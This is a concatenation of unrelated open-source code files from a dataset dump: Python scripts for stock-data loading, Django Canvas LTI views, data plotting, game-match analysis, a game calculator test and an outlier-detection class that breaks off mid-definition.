geti_fundametal_fromiwencai.py\n@time: 2017/11/4 15:11\n\"\"\"\nimport sys\nimport pandas as pd\nfrom db_manager import mongo_manager\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n# iwencai_data_path = 'D://{0}.xls'.format(pd.Timestamp.now().strftime(\"%Y-%m-%d\"))\niwencai_data_path = 'D://历史数据//{0}.xls'.format(\"每股净资产2017\")\n# info_type = \"per_share\" # 基本每股收益\n# info_des = \"基本每股收益\"\n# info_type = \"weight_roe\" # 加权roe\n# info_des = \"加权净资产收益率\"\n# info_type = \"net_cash_flow\" # 经营现金流净额\n# info_des = \"经营现金流量净额\"\n# info_type = \"net_profit\" # 净利润\n# info_des = \"净利润\"\n# info_type = \"net_profit_growth\" # 净利润增长率\n# info_des = \"净利润同比增长率\"\n# info_type = \"net_assets\" # 净资产\n# info_des = \"净资产\"\n# info_type = \"per_share_cash\" # 每股现金流\n# info_des = \"每股现金流\"\n# info_type = \"publish_roe\" # 摊薄roe\n# info_des = \"摊薄净资产收益率\"\n# info_type = \"roic\" # 投入资本回报率\n# info_des = \"投入资本回报率\"\n# info_type = \"interest_rate\" # 销售净利率\n# info_des = \"销售净利率\"\n# info_type = \"gross_margin\" # 销售毛利率\n# info_des = \"销售毛利率\"\n# info_type = \"revenue\" # 营业收入\n# info_des = \"营业收入\"\n# info_type = \"revenue_growth\" # 营业收入同比增长率\n# info_des = \"营业收入(同比增长率)\"\n# info_type = \"capital_expend\" # 资本支出\n# info_des = \"购建固定资产、无形资产和其他长期资产支付的现金\"\n# info_type = \"assets_liabilities_ratio\" # 资产负债率\n# info_des = \"资产负债率\"\ninfo_type = \"per_net_asset\" # 每股净资产\ninfo_des = \"每股净资产\"\n\n# 连续24季度基本每股收益\n# 2005年1季度2季度3季度4季度每股净资产 2006年1季度2季度3季度4季度每股净资产 2007年1季度2季度3季度4季度每股净资产 2008年1季度2季度3季度4季度每股净资产 2009年1季度2季度3季度4季度每股净资产 2010年1季度2季度3季度4季度每股净资产\n\ndef update_iwencai_data_all():\n # 连接finance_robot数据库\n mongo_mg = mongo_manager.Mongo_Manager('finance_robot')\n # iwencai_data_download(iwencai_data_path)\n iwencai_data = pd.read_html(iwencai_data_path)\n iwencai_data = iwencai_data[0] if iwencai_data else pd.DataFrame()\n rename_dict = {}\n new_columns_list = iwencai_data.iloc[0].tolist()\n for i in range(len(new_columns_list)):\n rename_dict.update({i: new_columns_list[i]})\n iwencai_data.rename(columns=rename_dict, inplace=True)\n iwencai_data = iwencai_data.drop(0)\n iwencai_data = iwencai_data.replace('--', float(0))\n current_time = pd.Timestamp.now().strftime(\"%Y%m%d %H:%M:%S\")\n for line in range(len(iwencai_data)):\n line_info = iwencai_data.iloc[line].to_dict()\n stock_code = str(line_info.get(u'股票代码')).split('.')[0]\n stock_name = str(line_info.get(u'股票简称'))\n for key, item in line_info.items():\n insert_info = dict(code=stock_code, name=stock_name, update_time=current_time)\n if key == '股票代码' or key == '股票简称':\n continue\n elif info_des in key:\n report_date = get_date(key)\n mongo_id = 'iwencai_' + str(insert_info[\"code\"]) + \"_\" + report_date\n insert_info.update({\"_id\": mongo_id, \"date\": report_date, info_type: float(item)})\n # 更新时使用的where条件\n update_where = {\"code\": insert_info[\"code\"], \"_id\": mongo_id}\n try:\n mongo_mg.pd_insertone_mongo('i_mental_infos', insert_info, update_where)\n except Exception as e:\n print(e, insert_info)\n else:\n print('error::', key, item)\n\ndef get_date(column_name):\n real_date = column_name.split(')')[1]\n # real_date = column_name[-10:]\n real_date = real_date.replace('.', '')\n return real_date\n\ndef update_industry():\n \"\"\"补全行业和概念\"\"\"\n # 连接finance_robot数据库\n mongo_mg = mongo_manager.Mongo_Manager('finance_robot')\n code_list = mongo_mg.pd_read_mongo('i_mental_infos', {\"date\": \"20170930\"}).sort_values(by=['code'], ascending=1)['code'].tolist()\n iwencai_data = update_industry_fromwencai()\n for code in code_list:\n try:\n stock_conception = iwencai_data[iwencai_data.code == code]['conception'].tolist()[0]\n except:\n stock_conception = \"暂无概念\"\n try:\n stock_industry = mongo_mg.pd_read_mongo('iwencai_mental_infos', {\"code\": code})['industry'].tolist()[0]\n except:\n print(code)\n try:\n stock_industry = iwencai_data[iwencai_data.code == code]['industry'].tolist()[0]\n except Exception as e:\n print(e, '######### errorcode ', code)\n # print stock_industry\n update_where = {\"code\": code}\n update_info = {\"industry\": stock_industry, \"conception\": stock_conception}\n try:\n mongo_mg.pd_insertall_mongo('i_mental_infos', update_info, update_where)\n except Exception as e:\n print(e)\n\ndef update_industry_fromwencai():\n # 股票代码、股票简称、所属同花顺行业、所属概念\n iwencai_data_path = \"D:\\\\2017-11-16.xls\"\n iwencai_data = pd.read_html(iwencai_data_path)\n iwencai_data = iwencai_data[0] if iwencai_data else pd.DataFrame()\n rename_dict = {}\n new_columns_list = ['code', 'name', 'industry', 'conception']\n for i in range(len(new_columns_list)):\n rename_dict.update({i: new_columns_list[i]})\n iwencai_data.rename(columns=rename_dict, inplace=True)\n iwencai_data = iwencai_data.drop(0)\n iwencai_data = iwencai_data.replace('--', float(0))\n iwencai_data['code'] = iwencai_data['code'].apply(lambda x: x.split(\".\")[0])\n return iwencai_data\n\n\nif __name__ == \"__main__\":\n # update_iwencai_data_all()\n update_industry()\n\n","sub_path":"data_collection/data_from_iwencai/geti_fundametal_fromiwencai.py","file_name":"geti_fundametal_fromiwencai.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"589770053","text":"import requests\nfrom datetime import datetime, time\nfrom pytz import timezone\n\n\ndef load_attempts():\n devman_feed = 'https://devman.org/api/challenges/solution_attempts'\n pages = requests.get(devman_feed, params={'page':1}).json()['number_of_pages']\n\n for page in range(1, pages + 1):\n response = requests.get(devman_feed, params={'page': page}).json()\n yield from response['records']\n\n\ndef is_midnighter(attempt, hour_begin_night=0, hour_end_night=7):\n users_timestamp = attempt['timestamp']\n\n if users_timestamp:\n users_timezone = attempt['timezone']\n users_time = datetime.fromtimestamp(\n users_timestamp,\n timezone(users_timezone)\n ).time()\n return time(hour_begin_night, 0) < users_time < time(hour_end_night, 0)\n\n\ndef get_midnighters():\n users = {record['username'] for record in load_attempts() if is_midnighter(record)}\n return users\n\n\ndef output_user_owl(users):\n for user_index, user in enumerate(users, 1):\n print('{} {}'.format(user_index, user))\n\n\nif __name__ == '__main__':\n owls = get_midnighters()\n output_user_owl(owls)\n","sub_path":"seek_dev_nighters.py","file_name":"seek_dev_nighters.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"147204443","text":"import os\nimport sys\nsys.path.insert(1, os.path.join(sys.path[0], '../../..'))\nimport app.calculator.calculator as calc\nfrom app import testing_helpers\n\n\nattacker, defender, options, tol = testing_helpers.defaults()\n\n# target source: http://alphamou.se/ti4calc/\ntarget = [53, 0, 46] # target percentages; [tie, attacker, defender]\nprint(\"1 Flagship 2 Fighter [Naalu] vs 2 Infantry\")\n\n# Units\nattacker[\"flagship\"] = 1\nattacker[\"fighter\"] = 2\ndefender[\"infantry\"] = 2\n\n# Factions\noptions[\"att_faction\"] = \"Naalu\"\n\n# Ground Combat\noptions[\"ground_combat\"] = True\n\n# Options\n\noutcomes = calc.calculate(attacker, defender, options)\ntesting_helpers.evaluate(outcomes, target, tol)\n","sub_path":"app/tests/faction_units/Naalu_flagship.py","file_name":"Naalu_flagship.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"209016645","text":"import logging\nimport json\n\nfrom django.shortcuts import redirect\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom django.core.exceptions import PermissionDenied\nfrom django.utils import timezone\n\nfrom ims_lti_py.tool_config import ToolConfig\n\nfrom icommons_common.models import School, Term, Department, CourseGroup, Person\nfrom icommons_common.canvas_api.helpers import accounts as canvas_api_accounts\nfrom icommons_common.auth.lti_decorators import has_account_permission\n\nfrom canvas_course_site_wizard.models import BulkCanvasCourseCreationJob, CanvasCourseGenerationJob\n\nfrom .models import (\n get_course_instance_query_set,\n get_course_instance_summary_data,\n get_course_job_summary_data\n)\nfrom .utils import (\n get_school_data_for_user,\n get_term_data_for_school,\n get_department_data_for_school,\n get_course_group_data_for_school,\n get_term_data,\n get_canvas_site_templates_for_school,\n get_canvas_site_template\n)\n\n\nlogger = logging.getLogger(__name__)\n\nCOURSE_INSTANCE_FILTERS = ['school', 'term', 'department', 'course_group']\n\n\ndef lti_auth_error(request):\n raise PermissionDenied\n\n\n@require_http_methods(['GET'])\ndef tool_config(request):\n env = settings.ENV_NAME if hasattr(settings, 'ENV_NAME') else ''\n url = \"%s://%s%s\" % (\n request.scheme,\n request.get_host(),\n reverse('bulk_site_creation:lti_launch', exclude_resource_link_id=True)\n )\n lti_tool_config = ToolConfig(\n title=\"Canvas Site Creator %s\" % env,\n launch_url=url,\n secure_launch_url=url,\n description=\"This LTI tool provides canvas site creation functionality.\"\n )\n\n # this is how to tell Canvas that this tool provides an account navigation link:\n lti_tool_config.set_ext_param('canvas.instructure.com', 'account_navigation', {\n 'enabled': 'true',\n 'text': \"Canvas Site Creator %s\" % env\n })\n lti_tool_config.set_ext_param('canvas.instructure.com', 'privacy_level', 'public')\n\n return HttpResponse(lti_tool_config.to_xml(), content_type='text/xml', status=200)\n\n\n@login_required\n@require_http_methods(['POST'])\n@csrf_exempt\ndef lti_launch(request):\n logger.debug(\"bulk_site_creation launched with params: %s\", json.dumps(request.POST.dict(), indent=4))\n return redirect('bulk_site_creation:index')\n\n\n@login_required\n@has_account_permission(canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES)\n@require_http_methods(['GET'])\ndef index(request):\n canvas_user_id = request.LTI['custom_canvas_user_id']\n sis_account_id = request.LTI['custom_canvas_account_sis_id']\n ci_filters = {key: request.GET.get(key, '') for key in COURSE_INSTANCE_FILTERS}\n (account_type, _) = canvas_api_accounts.parse_canvas_account_id(sis_account_id)\n schools = []\n terms = []\n departments = []\n course_groups = []\n school = None\n\n if account_type in canvas_api_accounts.ACCOUNT_TYPES:\n # We are in the context of a SIS type account, so limit options to that context\n school_id = sis_account_id\n if account_type == canvas_api_accounts.ACCOUNT_TYPE_DEPARTMENT:\n department = canvas_api_accounts.get_account_by_sis_account_id(canvas_user_id, sis_account_id)\n department_id = department['sis_account_id']\n school_id = department['parent_account_id']\n ci_filters[canvas_api_accounts.ACCOUNT_TYPE_COURSE_GROUP] = department_id\n departments.append(get_department_data_for_school(canvas_user_id, school_id, department_id))\n elif account_type == canvas_api_accounts.ACCOUNT_TYPE_COURSE_GROUP:\n course_group = canvas_api_accounts.get_account_by_sis_account_id(canvas_user_id, sis_account_id)\n course_group_id = course_group['sis_account_id']\n school_id = course_group['parent_account_id']\n ci_filters[canvas_api_accounts.ACCOUNT_TYPE_COURSE_GROUP] = course_group_id\n course_groups.append(get_course_group_data_for_school(canvas_user_id, school_id, course_group_id))\n school = get_school_data_for_user(canvas_user_id, school_id)\n ci_filters[canvas_api_accounts.ACCOUNT_TYPE_SCHOOL] = school['id']\n schools.append(school)\n else:\n # We are outside the context of a SIS type account, so show all schools\n # that the user has permission to create courses for\n schools = get_school_data_for_user(canvas_user_id)\n school_sis_account_id = ci_filters.get('school')\n if school_sis_account_id:\n school = get_school_data_for_user(canvas_user_id, school_sis_account_id)\n\n if len(schools) == 0:\n return redirect('not_authorized')\n\n if school:\n # Populate term, department, and course_group filter options if we already have a school\n school_sis_account_id = school['id']\n terms = get_term_data_for_school(school_sis_account_id)\n if not departments and not course_groups:\n departments = get_department_data_for_school(canvas_user_id, school_sis_account_id)\n course_groups = get_course_group_data_for_school(canvas_user_id, school_sis_account_id)\n\n return render(request, 'bulk_site_creation/index.html', {\n 'filters': ci_filters,\n 'schools': schools,\n 'terms': terms,\n 'departments': departments,\n 'course_groups': course_groups\n })\n\n\n@login_required\n@has_account_permission(canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES)\n@require_http_methods(['GET'])\ndef audit(request):\n canvas_user_id = request.LTI['custom_canvas_user_id']\n sis_account_id = request.LTI['custom_canvas_account_sis_id']\n (account_type, account_id) = canvas_api_accounts.parse_canvas_account_id(sis_account_id)\n\n filter_kwargs = {}\n if account_type == canvas_api_accounts.ACCOUNT_TYPE_SCHOOL:\n filter_kwargs['school_id'] = account_id\n elif account_type == canvas_api_accounts.ACCOUNT_TYPE_DEPARTMENT:\n filter_kwargs['sis_department_id'] = account_id\n elif account_type == canvas_api_accounts.ACCOUNT_TYPE_COURSE_GROUP:\n filter_kwargs['sis_course_group_id'] = account_id\n\n query_set = BulkCanvasCourseCreationJob.objects.filter(**filter_kwargs).order_by('-created_at')\n\n jobs = []\n creator_ids = set()\n school_ids = set()\n term_ids = set()\n department_ids = set()\n course_group_ids = set()\n for bulk_job in query_set:\n jobs.append(bulk_job)\n creator_ids.add(bulk_job.created_by_user_id)\n school_ids.add(bulk_job.school_id)\n term_ids.add(bulk_job.sis_term_id)\n if bulk_job.sis_department_id:\n department_ids.add(bulk_job.sis_department_id)\n if bulk_job.sis_course_group_id:\n course_group_ids.add(bulk_job.sis_course_group_id)\n\n creators = {p.univ_id: p for p in Person.objects.filter(univ_id__in=creator_ids)}\n schools = School.objects.in_bulk(school_ids)\n terms = Term.objects.in_bulk(term_ids)\n departments = {}\n if department_ids:\n departments = {\n id: name for id, name in Department.objects.filter(\n department_id__in=department_ids\n ).values_list('department_id', 'name')\n }\n course_groups = {}\n if course_group_ids:\n course_groups = {\n id: name for id, name in CourseGroup.objects.filter(\n course_group_id__in=course_group_ids\n ).values_list('course_group_id', 'name')\n }\n\n bulk_job_data = []\n for bulk_job in jobs:\n try:\n creator = creators[bulk_job.created_by_user_id]\n creator_name = \"%s, %s\" % (creator.name_last, creator.name_first)\n except KeyError:\n # Bulk job creator could not be found\n logger.warning(\"Failed to find bulk canvas site job creator %s\", bulk_job.created_by_user_id)\n creator_name = ''\n\n school = schools[bulk_job.school_id]\n term = terms[bulk_job.sis_term_id]\n department = ''\n if bulk_job.sis_department_id:\n department = departments[bulk_job.sis_department_id]\n course_group = ''\n if bulk_job.sis_course_group_id:\n course_group = course_groups[bulk_job.sis_course_group_id]\n template_canvas_course = get_canvas_site_template(school.school_id, bulk_job.template_canvas_course_id)\n\n bulk_job_data.append({\n 'id': bulk_job.id,\n 'created_at': timezone.localtime(bulk_job.created_at).strftime('%b %d, %Y %H:%M:%S'),\n 'status': bulk_job.status_display_name,\n 'created_by': creator_name,\n 'term': term.display_name,\n 'school': school.title_short,\n 'subaccount': department if department else course_group,\n 'template_canvas_course': template_canvas_course,\n 'count_course_jobs': CanvasCourseGenerationJob.objects.filter(bulk_job_id=bulk_job.id).count()\n })\n\n return render(request, 'bulk_site_creation/audit.html', {\n 'bulk_job_data': bulk_job_data\n })\n\n\n@login_required\n@has_account_permission(canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES)\n@require_http_methods(['GET'])\ndef course_selection(request):\n canvas_user_id = request.LTI['custom_canvas_user_id']\n ci_filters = {key: request.GET.get(key, '') for key in COURSE_INSTANCE_FILTERS}\n\n try:\n school = get_school_data_for_user(canvas_user_id, ci_filters['school'])\n term = get_term_data(ci_filters['term'])\n except KeyError:\n redirect('bulk_site_creation:index')\n\n (account_type, school_id) = canvas_api_accounts.parse_canvas_account_id(school['id'])\n canvas_site_templates = get_canvas_site_templates_for_school(school_id)\n\n account = school\n department = {}\n if ci_filters['department']:\n department = get_department_data_for_school(canvas_user_id, school['id'], ci_filters['department'])\n account = department\n course_group = {}\n if ci_filters['course_group']:\n course_group = get_course_group_data_for_school(canvas_user_id, school['id'], ci_filters['course_group'])\n account = course_group\n\n ci_query_set = get_course_instance_query_set(term['id'], account['id'])\n course_instance_summary = get_course_instance_summary_data(ci_query_set)\n\n return render(request, 'bulk_site_creation/course_selection.html', {\n 'filters': ci_filters,\n 'school': school,\n 'term': term,\n 'department': department,\n 'course_group': course_group,\n 'canvas_site_templates': canvas_site_templates,\n 'course_instance_summary': course_instance_summary\n })\n\n\n@login_required\n@has_account_permission(canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES)\n@require_http_methods(['POST'])\ndef create_job(request):\n canvas_user_id = request.LTI['custom_canvas_user_id']\n logged_in_user_id = request.LTI['lis_person_sourcedid']\n data = json.loads(request.POST['data'])\n\n template_canvas_course_id = data.get('template')\n filters = data['filters']\n term = filters.get('term')\n\n school_account_id = filters['school']\n account_id = school_account_id\n (account_type, school_id) = canvas_api_accounts.parse_canvas_account_id(school_account_id)\n\n department = None\n department_account_id = filters.get('department')\n if department_account_id:\n account_id = department_account_id\n (account_type, department) = department_account_id.split(':')\n\n course_group = None\n course_group_account_id = filters.get('course_group')\n if course_group_account_id:\n account_id = course_group_account_id\n (account_type, course_group) = course_group_account_id.split(':')\n\n # Check permissions for selected account\n if not canvas_api_accounts.has_permission(\n canvas_user_id, account_id, canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES):\n logger.info(\n 'Failed to create bulk job for user %s and account %s: Missing %s permission',\n canvas_user_id,\n account_id,\n canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES\n )\n raise PermissionDenied\n\n created_by_user_id = logged_in_user_id\n if not created_by_user_id:\n created_by_user_id = \"canvas_user_id:%s\" % canvas_user_id\n\n create_bulk_job_kwargs = {\n 'school_id': school_id,\n 'sis_term_id': int(term),\n 'sis_department_id': int(department) if department else None,\n 'sis_course_group_id': int(course_group) if course_group else None,\n 'template_canvas_course_id': template_canvas_course_id,\n 'created_by_user_id': created_by_user_id,\n 'course_instance_ids': data['course_instance_ids']\n }\n\n bulk_job = BulkCanvasCourseCreationJob.objects.create_bulk_job(**create_bulk_job_kwargs)\n\n return redirect('bulk_site_creation:bulk_job_detail', bulk_job.id)\n\n\n@login_required\n@has_account_permission(canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES)\n@require_http_methods(['GET'])\ndef bulk_job_detail(request, bulk_job_id):\n bulk_job = BulkCanvasCourseCreationJob.objects.get(id=bulk_job_id)\n bulk_job_complete = bulk_job.status in (\n BulkCanvasCourseCreationJob.STATUS_NOTIFICATION_SUCCESSFUL,\n BulkCanvasCourseCreationJob.STATUS_NOTIFICATION_FAILED\n )\n course_job_summary = get_course_job_summary_data(bulk_job.id)\n\n school = School.objects.get(school_id=bulk_job.school_id)\n term = Term.objects.get(term_id=bulk_job.sis_term_id)\n\n department = None\n if bulk_job.sis_department_id:\n department = Department.objects.get(department_id=bulk_job.sis_department_id).name\n\n course_group = None\n if bulk_job.sis_course_group_id:\n course_group = CourseGroup.objects.get(course_group_id=bulk_job.sis_course_group_id).name\n\n template = get_canvas_site_template(school.school_id, bulk_job.template_canvas_course_id)\n\n return render(request, 'bulk_site_creation/bulk_job_detail.html', {\n 'bulk_job': bulk_job,\n 'bulk_job_complete': bulk_job_complete,\n 'school': school.title_short,\n 'term': term.display_name,\n 'department': department,\n 'course_group': course_group,\n 'template': template,\n 'course_jobs_total': course_job_summary['recordsTotal'],\n 'course_jobs_complete': course_job_summary['recordsComplete'],\n 'course_jobs_successful': course_job_summary['recordsSuccessful'],\n 'course_jobs_failed': course_job_summary['recordsFailed']\n })\n","sub_path":"bulk_site_creation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"334595092","text":"import ast\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#plt.rcParams.update({'font.size': 16})\n\n\ngen_runs = {1:49, 2:34, 3:40, 4:39, 5:31, 6:36, 7:43, 8:35, 9:37, 10:31}\n\nfor gens in [30, 35, 40]:\n p_desc_runs = []\n for run in range(1,11):\n if gen_runs[run] < gens:\n continue\n if run == 9:\n continue \n \n ids_gen = pd.read_csv(f'gids/gen_ids_r{run}.csv') \n p_desc = pd.read_csv(f'pheno/desc_phen_r{run}.csv')\n \n cols = p_desc.columns.values\n \n pdesc_gens = []\n \n for g in range(gens):\n ids = ast.literal_eval(ids_gen[ids_gen['generation']==g]['robot_ids'].values[0])\n avg_gen = p_desc[p_desc['robot_id'].isin(ids)].mean()\n pdesc_gens.append(avg_gen)\n \n p_desc_runs.append(pdesc_gens)\n for col in cols:\n if col == 'robot_id':\n continue\n values = []\n for gen in range(gens):\n gen_vals = []\n for run in range(len(p_desc_runs)):\n gen_vals.append(p_desc_runs[run][gen][col])\n values.append(np.mean(gen_vals))\n\n col = 'length' if col == 'height' else col\n plt.plot(values, linewidth=3)\n plt.xlabel(\"Generation\")\n ylabel = col.capitalize().replace('_', ' ')\n plt.ylabel(ylabel)\n plt.savefig(f'avg_avg_{col}_gens_{gens}.png', bbox_inches='tight')\n plt.clf()\n","sub_path":"Scripts/Evolution and learning/learned_pheno.py","file_name":"learned_pheno.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"645025464","text":"# Import libraries\nimport datetime\nimport matplotlib as mp\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\n\n# Specify directories\nworking_directory = ['bin/iverson-2d-experiment/']\n# Input Files\ninput_filename_prefix = 'particles'\ninput_filename_suffix = '000.h5'\n\n# Add input\nntime = 126\ndt = 0.001\npoint_id = [0];\n\n# Preallocate variables\ntime = np.zeros((ntime + 1, 1))\ncoord = np.zeros((ntime + 1, len(working_directory)))\n\nfor k in range(0, len(working_directory), 1):\n\n\t# Output files\n\toutput_directory = working_directory[k] + 'results/'\n\toutput_prefix_filename = 'stress'\n\toutput_suffix_filename = '.vtp'\n\tif not os.path.exists(output_directory):\n\t\tos.makedirs(output_directory)\n\tprint(\"directory of files: \" + output_directory)\n\t\n\t# Loop all the .h5 files\n\tfor index in range(0, ntime + 1, 1):\n\t\n\t\t# Index multiplication\n\t\t#f k < 2:\n\t\t#\tmultiplication = 1\n\t\t#elif k < 4:\n\t\t#\tmultiplication = 2\n\t\t#else:\n\t\t#\tmultiplication = 4\n\t\tmultiplication = 1\n\t\tindex_mult = index * multiplication;\n\n\t\t# Prefix number of input file\n\t\tif index_mult < 10:\n\t\t\tzeros = '000'\n\t\telif index_mult < 100:\n\t\t\tzeros = '00'\n\t\telse:\n\t\t\tzeros = '0'\n\n\t\t# Concatenate filename\n\t\tinput_filename = working_directory[k] + input_filename_prefix + zeros + str(index_mult) + input_filename_suffix\n\t\toutput_filename = output_directory + output_prefix_filename + str(index_mult)\n\t\n\t\t# Read HDF5 - df refers to DataFrame\n\t\tdf = pd.read_hdf(input_filename)\n\t\n\t\t# Make np.array\n\t\tcoord_x = np.array(df['coord_x'])\n\t\tcoord_y = np.array(df['coord_y'])\n\t\t#coord_z = np.array(df['coord_z'])\n\t\t#stress_xx = np.array(df['stress_xx'])\n\t\t#stress_yy = np.array(df['stress_yy'])\n\t\t#stress_zz = np.array(df['stress_zz'])\n\t\t#tau_xy = np.array(df['tau_xy'])\n\t\t#strain_xx = np.array(df['strain_xx'])\n\t\t#strain_yy = np.array(df['strain_yy'])\n\t\t#strain_zz = np.array(df['strain_zz'])\n\t\n\t\t# Make data to store\n\t\t#for j in range(0, len(coord_x), 1):\n\t\t\t#coord[index, k] = max(coord_x[point_id[j]]\t\n\t\tcoord[index, k] = max(coord_x);\n\n\t\t# Prompt to make sure it's OK\n\t\tprint(input_filename + \" has been read at \" + str(datetime.datetime.now()))\n\t\n\t\t# Update time\n\t\ttime[index] = index * dt;\n\t\n\t\t# Update index for next time step\n\t\tindex += 1\n\n\ncoord_save = np.zeros((50, 1))\nfor i in range(0, 12, 1):\n\tcoord_save[i, 0] = coord[i * 10, 0]\n\nnp.savetxt('data.csv', coord_save, delimiter=',')\n\n# Plot\nline1, = plt.plot(time, coord[:, [0]] * 100, 'r', label='USF Case 1')\n#line2, = plt.plot(time, stress[:, [1]], 'c--', label='USL Case 1')\n#line3, = plt.plot(time, stress[:, [2]], 'g', label='USF Case 2')\n#line4, = plt.plot(time, stress[:, [3]], 'm--', label='USL Case 2')\n#line5, = plt.plot(time, stress[:, [4]], 'g', label='USF Case 3')\n#line6, = plt.plot(time, stress[:, [5]], 'y--', label='USL Case 3')\n#plt.axis([0, 0.20, -3000, 0])\nplt.xlabel('Time (s)')\nplt.ylabel('location in Longitunal (cm)')\n#plt.legend(handles=[line1, line2, line3, line4, line5, line6])\nplt.show()\n\n\n","sub_path":"hdf5_time_coord.py","file_name":"hdf5_time_coord.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"105836483","text":"from pymongo import MongoClient\nimport requests\nimport io, json\nimport time\nimport datetime\nimport pprint\n\nclient = MongoClient()\nurf_db = client['urf_data']\nmatches = urf_db['urf_matches']\n\nmatches_in_db = []\n\ntest_match = \"1792078510\"\n\nMEJAIS_ID = \"3041\"\npp = pprint.PrettyPrinter(indent=4)\ndef populateMatchesInDB():\n\tglobal matches\n\tglobal matches_in_db\n\tfor match in matches.find():\n\t\tmatches_in_db.append(match['matchId'])\n\ndef pprintMatch(match_id):\n\tglobal matches\n\tfor match in matches.find():\n\t\tif match_id == str(match['matchId']):\n\t\t\tprint(wasMejaisBought(match))\n\t\t\treturn True\n\ndef ppTime(timestamp):\n\ttotal_seconds = int(timestamp) / 1000\n\tminutes = str(total_seconds / 60).zfill(2)\n\tseconds = str(total_seconds % 60).zfill(2)\n\treturn (\"{0}:{1}\".format(minutes, seconds))\n\ndef wasMejaisBought(match):\n\ttimeline_frames = match[\"timeline\"][\"frames\"]\n\tprint(len(timeline_frames))\n\tfor frame in timeline_frames:\n\t\tif \"events\" in frame:\n\t\t\tfor event in frame[\"events\"]:\n\t\t\t\tif event[\"eventType\"] == \"ITEM_PURCHASED\":\n\t\t\t\t\t\tif MEJAIS_ID == str(event[\"itemId\"]):\n\t\t\t\t\t\t\tprint(\"{0} bought {1} at {2}\".format(str(event[\"participantId\"]).zfill(2), event[\"itemId\"], ppTime(event[\"timestamp\"])))\n\t\t\t\t\t\t\treturn True\n\treturn False\n\npprintMatch(test_match)\n","sub_path":"urf_match_analyzer.py","file_name":"urf_match_analyzer.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"313556142","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Invenio.\n# Copyright (C) 2016-2021 CERN.\n#\n# Invenio is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"API views.\"\"\"\n\nfrom flask import Blueprint\n\n\ndef create_communities_api_blueprint(app):\n \"\"\"Create communities api blueprint.\"\"\"\n ext = app.extensions[\"invenio-communities\"]\n # control blueprint endpoints registration\n if app.config[\"COMMUNITIES_ENABLED\"]:\n return ext.communities_resource.as_blueprint()\n else:\n # return dummy blueprint\n return Blueprint(\n \"invenio_communities_api\",\n __name__,\n )\n","sub_path":"invenio_communities/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"491680326","text":"import numpy as np\nimport scipy as sp\nfrom sklearn.cluster import affinity_propagation\nfrom sklearn.covariance import GraphLasso\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.neighbors import KernelDensity\nfrom sklearn.utils import check_array\nfrom sklearn.utils.validation import check_is_fitted\n\nfrom ..base import BaseDetector\nfrom ..utils import timeit, Axes, OneDimArray, TwoDimArray\nfrom ..visualization import plot_graphical_model, plot_partial_corrcoef\n\n__all__ = ['GMM', 'KDE', 'SparseStructureLearning']\n\n\nclass GMM(BaseDetector):\n \"\"\"Outlier detector using Gaussian Mixture Models (GMMs).\n\n Parameters\n ----------\n contamination : float, default 0.01\n Amount of contamination of the data set, i.e. the proportion of\n outliers in the data set. Used to define the threshold.\n\n verbose : bool, default False\n Enable verbose output.\n\n gmm_params : dict, default None\n Other keywords passed to sklearn.mixture.GaussianMixture().\n\n Attributes\n ----------\n converged_ : bool\n True when convergence was reached in fit(), False otherwise.\n\n covariances_ : array-like\n Covariance of each mixture component.\n\n lower_bound_ : float\n Log-likelihood of the best fit of EM.\n\n means_ : array-like of shape (n_components, n_features)\n Mean of each mixture component.\n\n n_iter_ : int\n Number of step used by the best fit of EM to reach the convergence.\n\n precisions_ : array-like\n Precision matrices for each component in the mixture.\n\n precisions_cholesky_ : array-like\n Cholesky decomposition of the precision matrices of each mixture\n component.\n\n threshold_ : float\n Threshold.\n\n weights_ : array-like of shape (n_components,)\n Weights of each mixture components.\n\n X_ : array-like of shape (n_samples, n_features)\n Training data.\n \"\"\"\n\n @property\n def converged_(self) -> bool:\n return self._gmm.converged_\n\n @property\n def covariances_(self) -> OneDimArray:\n return self._gmm.covariances_\n\n @property\n def lower_bound_(self) -> float:\n return self._gmm.lower_bound_\n\n @property\n def means_(self) -> OneDimArray:\n return self._gmm.means_\n\n @property\n def n_iter_(self) -> int:\n return self._gmm.n_iter_\n\n @property\n def precisions_(self) -> OneDimArray:\n return self._gmm.precisions_\n\n @property\n def precisions_cholesky_(self) -> OneDimArray:\n return self._gmm.precisions_cholesky_\n\n @property\n def weights_(self) -> 